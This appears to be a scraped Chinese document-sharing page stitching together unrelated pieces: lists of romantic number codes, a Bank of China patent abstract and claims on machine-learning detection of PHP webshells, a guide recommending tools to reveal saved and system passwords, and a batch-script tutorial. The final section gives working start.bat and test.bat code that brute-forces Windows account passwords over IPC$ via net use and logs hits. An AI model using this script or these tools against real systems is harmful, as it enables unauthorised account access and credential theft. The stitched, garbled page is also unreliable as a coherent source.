28、786:吃饱了 29、174:你去死 30、2131999:爱你想你久久久 31、7408695:其实你不了解我 32、8113:伴你一生 33、319421:想你就是爱你 34、54430:我时时想你 35、520:我爱你 36、77543:猜猜我是谁 37、246:饿死了 38、920:就爱你 39、918:加油吧 40、369958:神啊救救我吧 41、825:别爱我 42、95:救我 43、359258:想我就爱我吧 44、07868:你吃饱了吗 45、70885:请你帮帮我 46、912:就要爱 47、756:亲我啦 48、220225:爱爱你爱爱我 49、07382:你欺善怕恶 50、564335:无聊时想想我 51、211701:爱你一千年 52、74520:其实我爱你 53、296:爱走了 54、5452830:无时无刻不想你 55、53406:我想死你了 56、53881:我想抱抱你

【CN109905385A】一种webshell检测方法、装置及系统【专利】

(19)中华人民共和国国家知识产权局 (12)发明专利申请 (10)申请公布号 (43)申请公布日 (21)申请号 201910123769.5 (22)申请日 2019.02.19 (71)申请人 中国银行股份有限公司 地址 100818 北京市西城区复兴门内大街1 号 (72)发明人 俞学浩 蔡传智 王倩  (74)专利代理机构 北京三友知识产权代理有限 公司 11127 代理人 李辉 (51)Int.Cl. H04L 29/06(2006.01) G06F 17/27(2006.01) (54)发明名称 一种webshell检测方法、 装置及系统(57)摘要 本说明书实施例公开了一种webshell检测 方法、装置及系统,所述方法包括获取待检测网 页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节 码数据进行识别,获得所述待检测网页的 webshell检测结果,其中,所述监督学习算法包 括对确定为webshell的PHP脚本数据以及确定为 正常的PHP脚本数据对应的第二中间字节码数据 进行训练得到的webshell检测模型。利用本说明 书各实施例,可以提高PHP webshell检测的准确 性。权利要求书2页 说明书13页 附图3页CN 109905385 A 2019.06.18 C N 109905385 A

权 利 要 求 书1/2页CN 109905385 A 1.一种webshell检测方法,其特征在于,包括: 获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2.根据权利要求1所述的方法,其特征在于,所述利用构建的监督学习算法对所述第一中间字节码数据进行识别,包括: 基于预设的分词库,利用TF-IDF算法对所述第一中间字节码数据进行特征提取,获得所述待检测网页的特征数据,其中,所述分词库包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行分词处理后获得分词数据; 利用构建的监督学习算法对所述待检测网页的特征数据进行识别。 3.根据权利要求2所述的方法,其特征在于,所述利用TF-IDF算法对所述第一中间字节码数据进行特征提取,包括: 将所述第一中间字节码数据进行分词处理,获得所述待检测网页的PHP脚本数据对应的第一分词集合; 利用TF-IDF算法计算所述分词库中每个词相对所述第一分词集合的TF-IDF值; 将所述TF-IDF值按照相应的词在分词库中的位置进行一一对应,获得由TF-IDF值组成的向量,将该向量作为所述待检测网页的特征向量。 4.根据权利要求2或3所述的方法,其特征在于,所述预设的分词库采用下述方式构建: 获取确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据,获得样本集合; 将所述样本集合中的各脚本数据转换成中间字节码数据,获得各脚本数据对应的第二中间字节码数据; 对所述第二中间字节码数据进行分词处理,获得各脚本数据对应的第二分词集合; 将所述第二分词集合进行融合处理,获得分词库。 5.根据权利要求4所述的方法,其特征在于,所述webshell检测模型采用下述方式训练得到: 利用TF-IDF算法计算所述分词库中每个词相对所述第二分词集合的TF-IDF值,获得相应脚本数据的特征向量; 利用监督学习算法对所述确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据所对应的特征向量进行学习,获得webshell检测模型。 6.根据权利要求1所述的方法,其特征在于,所述待检测网页的webshell检测结果包括待检测网页是否属于webshell网页或者属于webshell网页的概率。 7.一种webshell检测装置,其特征在于,所述装置包括: 数据获取模块,用于获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 检测模块,用于利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2

万能密码破解【图解】

[技巧] 破解所有密码只需30秒 案例一:强力查"*"工具 打开软件后,将"X"图标,直接拖曳到需要查看密码的窗口中就可以了 下载地址: https://www.doczj.com/doc/cb8089708.html,/cfan/200622/xpass.zip 这个不是我的真实密码。。。呵呵 案例二:丢失的ADSL密码 dialupass的使用方法很简单,简单到你只要一运行,就能看到电脑中保存的拨号密码了下载地址:

https://www.doczj.com/doc/cb8089708.html,/cfan/200622/dialupass.rar 我不是ADSL的所以没显示。。哦。。。没有也可以建一个。。。哈哈。。。。刷QB 的时候应该很多用途吧 案例三:找到系统管理员的密码 系统里面有很多帐号,如果经常不用就会忘记了,对于这部分密码,要找回来,同样非常麻烦。Mr.cfan 就把networkpasswordrecovery推荐给大家吧。 将软件和汉化包解压至相同目录,运行后就能看到当前系统中的所有帐号信息了。

下载地址: https://www.doczj.com/doc/cb8089708.html,/utils/netpass.zip 汉化包: https://www.doczj.com/doc/cb8089708.html,/utils/trans/netpass_schinese.zip 案例四:让系统对我透明 若是所以的"*"都现出原形,是不是会让你觉得很方便呢?也不顾用拖曳图标了,想看就看,让系统密码 完全“透明”。这可是Mr.cfan强力推荐的软件。同样将软件和汉化包解压至相同目录,运行后,系统就

会自动变得的“透明”,同时,所有“透明”化处理过的程序都会被收集起来 下载地址: https://www.doczj.com/doc/cb8089708.html,/utils/astlog.zip 汉化包: https://www.doczj.com/doc/cb8089708.html,/utils/trans/astlog_schinese.zip 奇怪,我打开什么信息都没有 案例五:5秒内破解Word/Excel密码 千万别以为你把DOC、XLS文档加了个密码,就万事OK了,现在的软件只要几秒就可

爱情数字密码

爱情数字密码 [标签:栏目] ,爱情数字密码 1、369958:神啊救救我吧 2、74520:其实我爱你 3、920:就爱你 4、825:别爱我 5、0437:你是神经 6、259758:爱我就娶我吧 7、2406:爱死你啦 8、9213:钟爱一生 9、2031999:爱你想你久久久 10、786:吃饱了 11、99113148875:求求你一生一世别抛弃我 12、06537:你惹我生气 13、32102:想念你的爱 14、775885:親親我抱抱我 15、7408695:其实你不了解我 16、81176:不要在一起了 17、53406:我想死你了 18、0532:你我深爱 19、246:饿死了 20、04527:你是我爱妻 21、5452830:无时无刻不想你 22、01925:你依旧爱我 23、73817:情深怕缘浅 24、70626:请你留下来 25、296:爱走了 26、0837:你别生气

27、564335:无聊时想想我 28、2131999:爱你想你久久久 29、07382:你欺善怕恶 30、3344587:生生世世不变心 31、3731:真心真意 32、77543:猜猜我是谁 33、7418695:其实你不了解我 34、5420:我只爱你 35、515206:我已不爱你了 36、174:你去死 37、1234567:你是我的未婚妻 38、706519184:请你让我依靠一辈子 39、220225:爱爱你爱爱我 40、282:饿不饿 41、319421:想你就是爱你 42、53881:我想抱抱你 43、5231:我爱上你 44、70885:请你帮帮我 45、25910:爱我久一点 46、20184:爱你一辈子 47、809:保齡球 48、1240:最爱是你 49、917:就要亲 50、520:我爱你 51、21184:爱你一辈子 52、359258:想我就爱我吧 53、73807:情深怕缘浅 54、584520:我發誓我愛你 55、7708801314520:亲亲你抱抱你一生一世我爱你

写Bat暴力破解系统密码

原理: 1、字典:for /f %i in (字典文件) do net use 主机ipc$ "%i" /user:"用户" 2、数字:for /l %i in (start,step,end) do net use 主机ipc$ "%i" /user:"用户" 实现: 将下面文件存为start.bat: @echo off echo ---------------------------------------- >>c:pwd.txt date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解结果:>>c:pwd.txt if "%6"=="1" goto shit2 :shit1 start "正在破解....." /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit :shit2 start "正在破解......" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 :quit 将下面文件存为test.bat: net use %1ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL% :answer0 echo 远程主机:"%1" >>c:pwd.txt echo 用户:"%3" >>c:pwd.txt

echo 密码:%2 >>c:pwd.txt net use %1ipc$ /delet date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解完成。。。。zypcc >>c:pwd.txt exit :answer2 用法如下: 1、如果用字典破解:start.bat 字典文件路径及名称主机用户名 2、如果用数字破解: start.bat 起始数步长结束数主机用户名1

相关主题
文本预览
相关文档 最新文档